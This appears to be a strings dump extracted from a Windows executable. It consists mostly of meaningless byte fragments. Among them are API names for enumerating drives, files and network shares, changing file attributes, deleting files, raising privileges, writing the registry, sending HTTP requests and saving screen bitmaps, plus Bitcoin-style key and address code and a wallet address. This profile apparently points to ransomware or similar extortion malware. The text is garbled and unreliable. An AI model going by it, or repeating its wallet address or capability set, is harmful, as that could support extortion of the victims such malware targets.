!This program cannot be run in DOS mode.
{cSX
{cRicht
.text
`.rdata
@.data
.rsrc
@.reloc
B<#u
u	_^3
t+hbg
SRj@
WWj$W
WWj&W
WWj#W
T$63
D$*f
L$ Q
T$ R
D$ P
L$ Qh
T$HRV
f9|F
SVW3
WWWS
PQVS
QRVS
SVWP
1f;2u
QVhP
QVh@
B(ht
Q(ht
B@hl
Q8PRht
RPQhx8C
B@hl
B8QPht
PQRh
SVWj@P
j hH
SVW3
Sj1R
D$<3
O,Qj
G0Pj
SSSSP
T$8Ph
B4VP
D$HSP
D$P<
L$DQS+
D$X;
T$TPR
D$t;
L$pPQ
L$$Q
H8RV
PQRW
t+hbg
jPQR
t+hbg
t+hbg
hb)!
RPPO
V	0P
QPPO
P	0V
D$<954
$j h
9t$Dt
D$TP
D$Xg
D$`r
D$d:
L$PQ
T$\R
D$`WP
T$PQ
D$Xhh
;L$<}
;T$<}
;t$<}
;D$<}
D$HP
L$TQ
D$Xg
D$`r
D$d:
D$\P
L$`h
_^[3
D$$W
$jDQ
T$$S
D$$hP
L$$h`
T$<R
Pj@Q
T$,j
T$(j
D$<P
Qj@R
D$,j
L$$Q
9\$0
9\$$
9\$ 
9\$H
9\$<
9\$D
9\$8
9\$@
9\$4
9\$(t
T$|RP
T$`R
D$d$
D$XP
L$|QR
T$Tj
_^[3
F\ _^
SVW3
j	Qf
L$$Qh
L$(QP
T$.3
P0QV
\$ ;
T$ RP
w.t:;
hPm@
h@q@
h 0@
h@q@
h 0@
_^[3
_^[h`
SVWh
SVW3
u"h4
u"h8
_[u;
F #F
+A _
B +q$
r$^]
PQPR
F P3
PQPR
PQPR
PQPR
PQPR
PQPR
PQPR
PQPR
PQPR
PRPS
PSPR
QPQP
QPQP
PSPQ
F$P3
QPQP
QPQP
F QPQP
QPQP
PQPQ
PQPR
p$^[]
>AA6
~PWW
px;]
C$_^[
W9FxtG
CT_^[
9BPt8
N$_^[
Cx_^[
>RQ>
>g))
>LwH'
_^[]
SVWj?
hX2B
hp2B
PSQW
,SVW3
h4U5
SVW3
QSWV
QSVW
t#f;
QVVj
QRVj
tVSW
SVWj
j PPPj
PPPh
t+hbg
USVW
_^[]
USVW
E03E
E43E
E83E
E<QR
EP3E4
ET3E8
EX3E<
E\QR
Ep3ET
Et3EX
Ex3E\
E|QR
_^[]1
USVW
_^[]
USVW
_^[]1
YY;E
SSSSS
_^[]
woVW
 SW3
8CSVh
8"uY
8"u%
_^[]
 SW3
8CSVh,{A
8"u]
WVh,{A
8"u'
_^[]
^[_3
VW9]
_^[]
t"Ou
=H;C
hH;C
uTVWh
j h =C
h@=C
@uoW
_^[]
t'Ou
 SW3
jXh`=C
YQPVh
t&:a
;5XhC
5XhC
Fh=0dC
5XhC
=0dC
_^[]
to=XmC
=XiC
Y_^[]
Fpt"
Fh0dC
h(>C
PPPPP
PPPPP
<v*V
hX B
^SSSSS
@u^V
t%HHt
HHtXHHt
HHty+
RPSW
90tW
?If90t
@u^V
t$HHt
HHtYHHt
HHty+
RPSW
90tX
j0Xf
RPSW
90tN
j Xf
^_[3
hP>C
hp>C
t!Ht
_^[]
Y_^[
Y_^[
Y__^[
9csm
=T;C
t hT;C
j@j ^V
SWf9M
j@j 
u,9E
~,WPV
98t^
tVPV
t/9U
uNSW
VVhU
h8?C
8csm
 w	f
"u	3
tAVWP
Y[_^
PPPPP
8"u8
t	j\Yf
t$9U
QQSVWh
URPQQhP
L$,3
UVWS
[_^]
SVWj
_^[]
9]$u
9](SS
t"SS9] u
9] SS
v4;5
vL;5
PPPPPPPP
PPPPPPPP
u}h,2B
h 2B
hX?C
QSWVj
v	N+D$
~%9M
QVj	
r 8^
hx?C
_^[]
oV f
o^0f
of@f
onPf
ov`f
o~pf
FGIu
X^_]
FGIu
SVWUj
]_^[
;t$,v-
UQPXY]Y[
@hD2B
SSSSS
_^[]
WVS3
hL;C
80t/
PPPPP
SQRP
jdRP
@PVS
@PVS
Wj0S
|-;E
VVVVV
9csm
SSSSW
SSSSW
@PWV
_^[]
PPPPP
WVU3
v	N+D$
r"9U
r"9U
9M$u
<+t"<-t
+t HHt
hp;C
PPPPP
u-hh;C
u"9U
h`;C
hX;C
u	9p
u	9E
;9u	
0K;]
@tH9
_Tw@fTw
jw99
wiw`wiwQ
/lpX0lp
"#tqf"t
"#t7$#t
p (n
CorExitProcess
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
(null)
( 8PX
700WP
`h````
xpxxxx
('8PW
700PP
`h`hhh
xppwpp
 Complete Object Locator'
 Class Hierarchy Descriptor'
 Base Class Array'
 Base Class Descriptor at (
 Type Descriptor'
`local static thread guard'
`managed vectorArrayList copy constructor iterator'
`vectorArrayList vbase copy constructor iterator'
`vectorArrayList copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vectorArrayList vbase copy constructor iterator'
`eh vectorArrayList copy constructor iterator'
`managed vectorArrayList destructor iterator'
`managed vectorArrayList constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
 delete[]
 new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt returning'
`copy constructor closure'
`eh vectorArrayList vbase constructor iterator'
`eh vectorArrayList destructor iterator'
`eh vectorArrayList constructor iterator'
`virtual displacement map'
`vectorArrayList vbase constructor iterator'
`vectorArrayList destructor iterator'
`vectorArrayList constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vectorArrayList deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
 delete
 new
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
XXXXXXXXXXXXX
XXXXXXXXXXXXX
0123456789ABCDEF
XXXXXXXXXXXXX
PO|?`
$P3pbiI
CW?z*Ua
zUAg
_;p\X
^uHP/
G7LD(9
;qZ7
 ~R`
<XX 
A}`UO=
G8o^
L^&<
6gs^
d+zW
An$,
Oc7*
OeMs
Ce}?
|t'(#o
]%m 
?d^#
Yaj/E
S"y2>}
%g5O$
61&0s
O\Hc
v4^fr
[pt=
WyRz]hnp6?
kT{%<
~5[I
92*Lr
~e&_V@t
\.?0
AnzY<
g=U=
@k5"
Tp.ho7Rqc
qPb;
jE<$
&v2t
D>gL
"\,g
%6sgD
swO)
"Rl(`
]%+L
oeFU
h.W7
Ie4@
F"9.F
rxDLw
?Ef>$
X3b[
1k)jU
(J~}-M
D8|G
:	xk
	zdj
SXqJ~
b(BvMP
`PoS@
VA46yd
)\l<
iiiZ
gk`'_
b+!7
MFGL
\k6h
UdesRsK
;8`&
fT1M
gJ%n$
44`o
RWO?
n{m4
DZ'E
(&"N
iqva
vEd8
/X9$
Y(t<
n~wL
3>.W
-[v4](
Z|Eqye
<+bh
XH:#
:`&/H
wnk	
:oRCv
2[Kk
gD~o
kBF|f
!QU7
>B.7
c5^4
X)gr!
t]yR
vo9B
pHua
s{*Nw
>#Fg
'H*5,
e\/m
aqyCe 
]~I.
w!K|
:@ixgP`c
bm+U-
~~Ch&
9#GT
VkAM
LER0mn
QG=:a
VY2-V/
j8xP
IyWy|
QlCqk
y}Q(
Umq#
8=p@:
bt~z
4)'_
5<Df[
Kp	*b
v:ZC{}k7]
Jrlq
7"5nJ_
-:GJA
.,QM
M4}?Jd
a0Hj`
UeP6
^cS>a
*267
9}#q
P;s#
oTchNu
RfESR x{B
Fzbhp/
k*..v
$B{Db
\6"n
:|CD
]'[Jr(
m Tt
eOp2k
9st7
QM'ai
Ctd1
2Hvn
E'8m(
9iH~
:/9&
jTF6>YC
r7#,
@%_S
k#E]*dH
d:\Bcdf
bb!!
mR@!
C`K=
KQ< 
y.sC"
N,U9
dD8C
kD|i
sT|/').4
,3NmZ
l]\PF
t2Ny
[a\t
6tMO
{M'r
{=LR
}1QW:
=m*8X
Nw}@
=y98
 o-m
*"\#
?.CN
GmzA
MF%C
9*/\z
0R{>
:1+g
?"'r
t1K<
{"\N
 p/r
DK1u
l@z*_
]>;iJ
6L9H
~Jh T
*x^R
MHPa
(IzH
^m?V
x)vX
al|e
469!
G!IxC
 $IH
.mCox
}pqD
Ama$x
p~:"<
jSX YC
_)4v
(NX~
)4B;eqd
% ,|
r%7dJ
;#_?
["&&
RvN+
SLi)
/"&c
5!>x
SBybw
6v%&
^I_a
|hil
ra_b
6nYQM
\]+{
kOH?
\!O2
DXKD
#{Hs
`g@+
Y|2V
H}jh:}hs
g1w)p
1N#{7!
e8i>m]
'	7$
"f;U
&?m1=I3
-I*~
vv.Q
s'jV-h3
s-:w
s%C4
'%Xy
XS(w
6dI?
,1;){
JiRi
tjAx
{vTm
 qqU{/
wsmN
-U=Q
O3,\
LE]#
8}Hr
))&4
:v?M
-R"l
:38>
WGVD
TaU+
eJ!*QS
r|fu
 '3G>
)F8r"+7k
]B!U
:E:i
,Y/w-
6E+,
S9I'
7~7]q?
7	-F[
!y*K
!bte(
:A>7t
[y"]
D@47
^cO)
Gj#t
Xv9O
;T}:
&co#
\p!r
yG.Ct
DHQi
Co#wF
?F|09V
*\,e
@o/E
}'D],
`jKN
I:wp
s*{d!
]pf>
y%+}Hb
/W'(
H7Pa
1`op
F2W8
Ebn[
F:e,
#d?K
@09S
{I&UP
<24T6
USdaG
y(w`
dR2/p
^8F7Q6
jcAA<
?KH)
zh,#
8:D8
&A1M
"//|
"?	f 
&=iI
N01R1
7asZ
o92z
m.GP
rnw`
T|/d
;6#B
1@V&
4)$|
rv-S
zjEFp
Hwwy
)5uC
~mr6
T"UK
c\l.
V na>
*g5Q
C!~;
Iu;}
ajZ3
H@0G_
[0)%
m@w(
I2`2
+sNV
=	At
e73C
>@a[
*zsd
99K:
%d$>I/c
TFP:
UG`v
Ac%i
?gA)NM
uffphL
	P@E
8@m^
LMKW
Rd%*cv
@3Z3
feQK
`m2_
Cb(2
^6`<
-GgQ{
4}l8=
:Vg3
*c{-
;	>)
BWSy
Y Go
i_~*
sPWS
F[2.swTTx
e~eE
	P?C
qlqL	
#0DN
:R:3?P
,~3y'
Laq2
-]S|
tFKe
'><,
xa##
SRQn
..-!
cVS,
6k5D\
8=MbR
DxCU
_MW*
c9D#Df
|q*;%
4Xu0>
B!-z)
?eaOmM
hcUw
6:h97SW
'AQ#
SOM5
O'WZ
'j1z
6P6UZ
vWIvfG
_0A`d
$Z\{
gEyd
@9TW*
<,o!
pZ>U
-J}3
|Vm4
9CR"
{D4jC
igo"FuOQ
.6x 	
cwz>
]kvic\
aNYr
$#\#\
>`^2
TlThS
pVXYJ
uo].
o~@H
UDs @p
FYh~
1:	G
CK='*]N
:o%xj
rX,9
/6@.
`{3f;
"`0f
y	x}
k	f&3]
Uc`4c/e
c<b!
*x!K
:Mb1
b6=LeI8YM
DK9'
zQHi
;HvY1
'T=-
9B!pU
!9sh6
zj_9
NuMb
\':Z
iu6N.
F'Z+
M	%Z
{ziG
:).= 
9U2%
d@m2N
_N|Z
TVZh
?S"p
}[Wm
yBI/G
&k^)
oMa(#w
7VaS
~E!"	
XchU
1 Je
tYPG
x"-e
|	BUd
X)+q
;'0u
C_sS
%h-:
&`6}N~
WuBK
U%]p-
3Y}E
JMxw
6zfT
O=]2
A#'9sU.
p>CJ
.>-d
s2RRH
Ve&b
)?K-
@Lj!r7
A?*8
0GU^6X
@<jb)*U
%m^i
:@vw5!Bb
^4bL
Ud-g
X+]m~
je9$
i554
	~"5A
I [4
Gg3Ux
DG$Ba
Lg-1
wu%/
3C[F
{qqo
D"7	
x>[x:
Vrl\w
2D(^v
Xj!I
w9{p<W*
|~#s
/xp-
d XI
|)+p
 eH`
lfM[Fi
Dcb 
.:^>
V6?nEc
9=)e
F345
z)g2
[8c=
0s,,
J.{"S
OW,>4g
"eFv
9j#B
wsIE
y:?>|B
TZ:4
[1jD
<#<!
JxPK
~'^K[u
~v,-
Hx23
13+:
]"%}qB
~cb)%i
)lVC
AMYT
<*M1g
T2M~
y/bI
/"VF
S~G	
^+R&e'H
CT}S
"PG:
MuK2
Z~&q
<~)D
ZdyRw
#_lE
$H8[)
jVtS
(H7^{
9S+?E+
rNf=
fB3h
u8IP
C:9D
:@W^
G'rW
V-$[M
+O ,a
E=%	"
4Wft?
k9=F
0,T}
Kb9hC
,	#r&
@LZ 
3+US
yr	_
EKeX
rV [Y
ssA1
X>kz
xhs4
,eY&
-^1-
VhF B
q+2[
@'}2
3'4.
aDOu6
;8PFR
JY|(n(W
`vX9
	`VD
~-b^8
wmY[
YAC-z
m%UH
C	>2}
S482_
*SoWBU
xt$^
p`R$
@JT2
T~CE;
OU:z
_Dzl
^}YA
z&R%
n7qI
%JC5..X?
d[z=t
0=Q$
CSYC-h
_#	<A}
.2E!g
bPy!
Zu1O
p"3#
MJcS7-:LG
4 m! 
v@t 
6v,x
Tm:B`
Mcl_
EmDh9]
Z%#>A
Zf7(F
NF_	v
sF22
sA^E)
?[z%
t#x3
#R;fr
vC*DB
@X/[]u
efgJ
(Tlg
<\@{
POTg
fOR]
'aco19L
vW uSE
2/@r
	T%}
4W*a
Mm4k
;'N7
Hg(^
}x;r
tE=^
@S`Y81qb
5-dB
VDJ%
UyJ'
LxfCP
Sk p
t	L.
T(fT
n#[o.
r~H=
19O]
*K"o
]K;r_
NMn#
\N>uAV
R>!W
<cfp
"$Qd*
Xp!<A
	}6u
o Pmf
0''F
=?'/
T81;
9;Pw
1RF^
jz#*
-{W7 
m?OUX
2/D&#'
TmVG
.e&Q&
BH/~R
]3yF
opG'o
UU|OW
ifp(:
$Zut
->)P1
+[BL
{69I@
}KOlR
I88|
/LkUSui
`9u D}
D!CG;}
u<[t$
4&Ax
J0$0
__I3
G0"rl
fb+t
2|YGCD
pu&K K@
7Smy
+CFV
.=7=
V{	S`SGU
wV>m
:z~A
3eKn
}	}Vx#
l:~V
gyfb
h5qz&,
RVdC
;>-{
XGFy
(>`R
3d]J
Yt-hK
>2N+
_7_uF
=&M7
0Yh}B
	(*h{
w[SV\
6wRI
 RE_
}kj"=
647+
me|ii
d+N^
gII}+;
L8~h
!;#t
70%cJ|
5ICZ<
ti|0F
/i`	
eEP	1
!|T@
?ur<RYg
TEk	
~U>mt!
zW;Z
9bEk
	ol3
ImFk
|&yHB
lbp<
f-YW~
5|@u
 u6U
ux+x
LjyUA
7-WB
volJ
$@x>>
]G\Fi
U5A,	
KJhZh
s@q5
ajn	
dN+N=
F<33
sG9N
7;{?aAg
j^Rb
L-5x
-(L	
qecf
&P#g
]WNG
A+fW
@dM3!N.
2bj1Q
X3l&
ax`gC
	*\0K
}L{[
nv%2
o0S8
Y3U	
jt|*
n,9e
1Iw4
\ONU
'4zS
Dh!Z
L4&U:@v
c_9X
&R I
{R41
'U&O
>@{Q
I_^D
I+,{n(
H P\]
p*Q!
T;p^
c~\V
H`?-
[Z|6
!Pp)y
."3+}]]
|_.D
G7z0
f><j
F_j'$
a itO
h8rg
mn&M
tZ1t
nJEH
9Ud'|	My
 z+)
bYRq3
JRxz
eMDU
?g_>
YO!v=
#kJ/
G]fi
IF3C
|W2?
6|@aT
yjWh
DX##-
<d2AwP
T2;!
ed_/
 \.@
E;&8D6
v) Z`
R-&%
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
RIPE-MD160
123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz
%X%X%X%X%X%X%X%X
%X%X%X%X%X%X%X%X
.dll
advapi32.dll
user32.dll
ws2_32.dll
ntdll.dll
winsta.dll
shell32.dll
wininet.dll
urlmon.dll
Gdi32.dll
gdiplus.dll
crypt32.dll
SHLWAPI.dll
Imagehlp.dll
psapi.dll
olE32.dll
winspool.drv
e+000
1#QNAN
1#INF
1#IND
1#SNAN
WNetCloseEnum
WNetOpenEnumW
WNetEnumResourceW
MPR.dll
GdipFree
GdipAlloc
GdipGetImageEncodersSize
GdipDisposeImage
GdipCreateBitmapFromHBITMAP
GdipGetImageEncoders
GdipSaveImageToFile
GdipCloneImage
GdiplusStartup
gdiplus.dll
PathFindExtensionW
PathFindFileNameW
SHLWAPI.dll
EnumProcesses
GetProcessImageFileNameW
PSAPI.DLL
GetFileSize
FindFirstFileW
SetFilePointer
GetDriveTypeW
HeapAlloc
GetLogicalDriveStringsW
HeapFree
GetProcessHeap
WriteFile
GlobalAlloc
GetFileAttributesW
ReadFile
CreateFileW
ExitThread
FlushFileBuffers
GlobalFree
FindClose
FindNextFileW
CloseHandle
SetFileAttributesW
GetVolumeInformationW
GetLastError
GlobalMemoryStatus
FreeLibrary
QueryPerformanceCounter
GetTickCount
LoadLibraryW
GetVersionExW
GetProcAddress
GetCurrentProcessId
ExitProcess
GetEnvironmentVariableW
CreateProcessW
Sleep
CopyFileW
GetModuleFileNameW
SetThreadPriority
DeleteFileW
GetCurrentProcess
SetLastError
LocalAlloc
GetShortPathNameW
LocalFree
KERNEL32.dll
LoadStringW
ReleaseDC
GetDC
DrawTextA
USER32.dll
CreateCompatibleBitmap
CreateCompatibleDC
SelectObject
DeleteObject
DeleteDC
GetStockObject
CreateFontW
SetBkMode
SetTextColor
GDI32.dll
RegCreateKeyExW
RegQueryValueExW
RegFlushKey
RegCloseKey
RegSetValueExW
OpenProcessToken
GetSidSubAuthority
GetTokenInformation
LookupPrivilegeValueW
AdjustTokenPrivileges
ADVAPI32.dll
SHGetFolderPathW
ShellExecuteExW
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
CoCreateInstance
CoInitializeEx
ole32.dll
InternetCrackUrlA
InternetSetOptionA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
GetSystemTimeAsFileTime
GetModuleHandleW
DecodePointer
EnterCriticalSection
LeaveCriticalSection
HeapReAlloc
GetCommandLineW
HeapSetInformation
GetStartupInfoW
TerminateProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
HeapCreate
GetCPInfo
InterlockedIncrement
InterlockedDecrement
GetACP
GetOEMCP
IsValidCodePage
EncodePointer
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetCurrentThreadId
LCMapStringW
GetStdHandle
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
SetHandleCount
GetFileType
WideCharToMultiByte
GetConsoleCP
GetConsoleMode
FreeEnvironmentStringsW
GetEnvironmentStringsW
RtlUnwind
MultiByteToWideChar
GetStringTypeW
HeapSize
WriteConsoleW
SetStdHandle
IsProcessorFeaturePresent
00P`00P
++}V++}
&&jL&&j
66Zl66Z
??A~??A
44\h44\
11Sb11S
##eF##e
''iN''i
,,tX,,t
;;Mv;;M
)){R)){
//q^//q
  `@  `
99Kr99K
33Uf33U
<<Dx<<D
88Hp88H
!!cB!!c
==Gz==G
""fD""f
**~T**~
22Vd22V
::Nt::N
$$lH$$l
77Yn77Y
%%oJ%%o
..r\..r
>>B|>>B
55_j55_
((xP((x
--wZ--w
R~AeS~Ae	
j:'^
+NpHhXpHh
@CFg
lZrNlZr
X6-9'6-9
[TE$6.:$6.
 ?ZwKiZwK
&O\r
gDf;
?uV},
bT~FbT~F
*?#1*?#
f1tN
JFeQ
+8$4,8$4
%w(<I
!Hl\tHl\
.?AVtype_info@@
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
                        
        
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
e*[	`
3+XaO
z'7g
tXzf
6	)s1
4jl+
A6RAY?
#hrP!E
i#7u
{R2:
^8)1
fjiS
RR7*2&
`O!ph
)*rS
`Rn/ @
tx$)
1Jg.w
%)<[+,
=\2Y
U=DY
v#4@
H 7 C
1J^I
 aWd[
<L@,
dXR6
"U\5R
zh]]
s$x|yy
D[u7
ze^m
w WL@.
^QlBz9
wf	KqE
8IqV
`Cnl|'
^v=/
S`JV)
4*",A
U}~U
4FtQbq)
|P6<
L;`1
gq@O
nr,+
4pC'
84bm,
V_Le
SH?|
n-6A
.U X
[{FV
~O$[Gqt*
)cj*
csMe~
;	G<
^A1IH
MU9g
pA~dYD
:Oa7
9% wq
lmze
T&?zy
%H0<.
&uf]
iZss
BlG]
w^_m
+2\x2?/S
3[sq
?\{Ir
g_CK
)/](
#y^(
Bdz%2#
Y>hC}N
({_w
bnx;
EV}n
pJx_
Z E[
Un^}}
6V7K
qBrk
z!:[
:F1.
NCC!
c.D<fC
Evdd4
udyq
l/zi
)Xvl~
vfamf
s1xm&f
F>MvO
LqKkf@{9_
$,gh
TIsL
Pqp$
6RlL
+9N]
	\e?
-Cx5
aR0t
:iRs
N<mfF
_]'f
:}CpC
{+D#	)
Zz*j
v3(W
|T}}q@
/^Ct
&|./
\viO&X
oQ-$
\1gS
^Al4
}8]H
m.UO
~ZHu
f3gmN
]_AD
g_rY
dP'56
X+)F
_:hP
.5FN_
mpn_tdiv_qr
Invalid flags
!secp256k1_fe_is_zero(&ge->x)
pubkey != NULL
input != NULL
outputlen != NULL
output != NULL
secp256k1_ecmult_gen_context_is_built(&ctx->ecmult_gen_ctx)
*outputlen >= ((flags & SECP256K1_FLAGS_BIT_COMPRESSION) ? 33 : 65)
pubkey != NULL
secp256k1_ecmult_context_is_built(&ctx->ecmult_ctx)
(flags & SECP256K1_FLAGS_TYPE_MASK) == SECP256K1_FLAGS_TYPE_COMPRESSION
seckey != NULL
pubkey != NULL
seckey != NULL
seckey != NULL
tweak != NULL
pubkey != NULL
tweak != NULL
seckey != NULL
tweak != NULL
secp256k1_ecmult_context_is_built(&ctx->ecmult_ctx)
pubkey != NULL
tweak != NULL
secp256k1_ecmult_gen_context_is_built(&ctx->ecmult_gen_ctx)
pubnonce != NULL
n >= 1
pubnonces != NULL
result != NULL
point != NULL
scalar != NULL
mpz_powm: Zero modulo.
mpz_powm: Negative exponent and non-invertible base.
mpz_rootrem: Negative argument, with even root.
mpz_rootrem: Zeroth root.
0123456789abcdefghijklmnopqrstuvwxyz
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
mpz_import: Nails not supported.
mpz_import: Nails not supported.
NetStatisticsGet
NetApiBufferFree
CryptAcquireContextW
CryptGenRandom
CryptReleaseContext
CreateToolhelp32Snapshot
CloseToolhelp32Snapshot
Heap32First
Heap32Next
Heap32ListFirst
Heap32ListNext
Process32First
Process32Next
Thread32First
Thread32Next
Module32First
Module32Next
...........234234.........
frP 
31,d;
u$kAt:0P^
JXy,z;
ao)`
H[=&
Qz}%
|KN)
7 q7
58-d{
*W2=
PB9!
O!<,~s
zYEf
NH0|
-dZp
)K7Ia
i n:~
{0q*)
CluUS
'_g-
9lPa
_xW2o
vjI.
h@w3_
oi[f
,3-~
q'Hp
hc>8
eLn>
pj95 
NUp=&
j5*M
n`+j`V
.~N&R
9Ck5j
7yL2l
-'N/u
jtu]p
pBiy
G.ya
.?AVGdiplusBase@Gdiplus@@
.?AVImage@Gdiplus@@
.?AVBitmap@Gdiplus@@
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb
  @_
dl4L
U)2g
'RCG:
\lJY
m<Ba
*i.T
bN)e
Y07=
lzEN
MoS=
8/Dc
~kC>
arN[%lg
S3r+
x\/>
Z_UE
[#C;
6.&%
F2451B11738FE62
15LtJE2QvwhVm712P8jQvmzKu6VENju454
Q6J)
[m5^9*
Q6J)
[m5^9*
+r5v
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
4$4+42494@4G4N4U4\4c4<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
566O6
70767D7P7j7
<<=Q=i=
>*>T>m>
?&?,?1?7?\?
"030j0u0
1"2T2w2
3G3M3`3l3y3
4*545d5r5~5
6!6)61666M6^6
7#7+727=7N7U7\7d7l7t7|7
909q9
:6;E;K;Y;a;i;w;|;
30E0
1G1X1v1}1
1}2X3
5#5B5r5
5	6&6
727U7<8Y8
2#2:2F2Z2s2y2
4L4R4b4h4v4|4
4C5P5V5b5h5
6!6'6-6
6	7D7I7m7
9&9/949o9
:$:1:]:l:u:z:
< <,<8<D<P<
?/?4?=?B?f?o?x?}?
0&0/040
8I9S9[9
;%;+;2;
<)<2<?<E<\<c<
=E>z>
>W?]?
030M0c0
1I1j1z1
2a2y2
3%343L3R3X3j3	5
5M5R5
<<?u?
3	4v4)5H5
646i6
:':4:::@:J:^:l:q:
:c;n;w;
<H=N=~=
=#>)>/>
061t1
2#2:2B2Q2j2w2
353D3
3#4[4|4
7<8h8
819E9L9V9d9v9
:9:F:U:d:
:,;6;`;y;
<@<F<f<
< =5=W=h=|=
>6>W>
>	?&?
1%1/191C1S1]1g1q1
2 2*242>2b2l2v2
3/393C3M3W3a3k3
4$4.484O4Y4c4m4w4
5&505:5D5T5^5h5r5
6!6+656?6c6m6w6
707:7D7N7X7b7l7
8%8/898P8Z8d8n8x8
9'919;9E9U9_9i9s9
:":,:6:@:d:n:x:
;2;?;O;_;l;|;
=%=8=H=x=
>:>G>Z>j>
?,?^?k?~?
,090L0\0
1)191~1
1Q2[2e2o2y2
3)333=3G3Q3[3s3}3
4)4A4K4U4_4i4y4
5#5-575G5Q5[5e5
6)636W6a6k6u6
7%7/797C7M7W7a7y7
8%8/8G8Q8[8e8o8
9)939=9M9W9a9k9
:%:/:9:]:g:q:{:
;+;5;?;I;S;];g;
<!<+<5<M<W<a<k<u<
="=;=K=[=i=v=
=/>6>D>K>V>]>h>o>
?"?)?7?>?I?P?[?b?s?z?
0*010<0C0N0U0f0m0{0
1$1/161A1H1Y1`1n1u1
2!2(232:2\2c2q2x2
3^3d3v3
354&7U7[7j7
?"?<?G?O?_?e?v?
0R1^1z1
2%272E2Z2d2
2(313
3u4{4
95:::D:
;%;,;3;:;A;H;O;V;^;f;n;z;
<$<)<
=1=T=g=
>P>g>
"0/090G0P0Z0
041i1|1
1	2R2
2U3a3t3
4)4P4y4
6>7X7i7
8!8'8/858A8G8T8^8d8n8
9;9A9G9]9u9
:8:B:z:
;#;(;0;9;E;J;O;U;Y;_;d;j;o;~;
<)<k<
>0?H?R?m?u?{?
0-0y0
3"3H3
>X?v?
666W648d:h:l:p:t:x:|:
<.<R<^?
182d2
6%8,868H8_8m8s8
:#:(:-:=:l:r:z:
;#<2<B<I<Q<
="=v={=
>A?^?
2"2L2
2)3A3_3
4F4O4[4
5/585_5l5q5
5Z6}6
8B9b9R:{:
>3>t>
>0?b?
:0l0
1 1$1(1,101z1
2$2(2,2M2w2
3 3$3(3
8!868r8
3,3>3P3b3t3
5>5I5O5_5d5u5}5
696S6
7'7E7
9	:>;_;
?6?V?
070J0b0
121_1
2a3m3
6&7N7
:]:b:h:l:r:v:|:
9$9+93989<9@9i9
: :$:(:,:
;I;P;T;X;\;`;d;h;l;
2 3&3
4K5?6G6
7q8w8
:Y=p=
0&0V0
\2`2d2h2l2x2|2
0$0,040<0D0L0T088<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
@5H5
;H;T;
<(<,<<<@<D<H<P<h<x<|<
<8=X=t=x=
>$>@>L>h>
?(?4?P?p?
0,000
0(000X8X9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
;(;8;H;X;|;
=X=\=`=d=h=l=p=t=x=|=
<6@6D6
$:H:d:
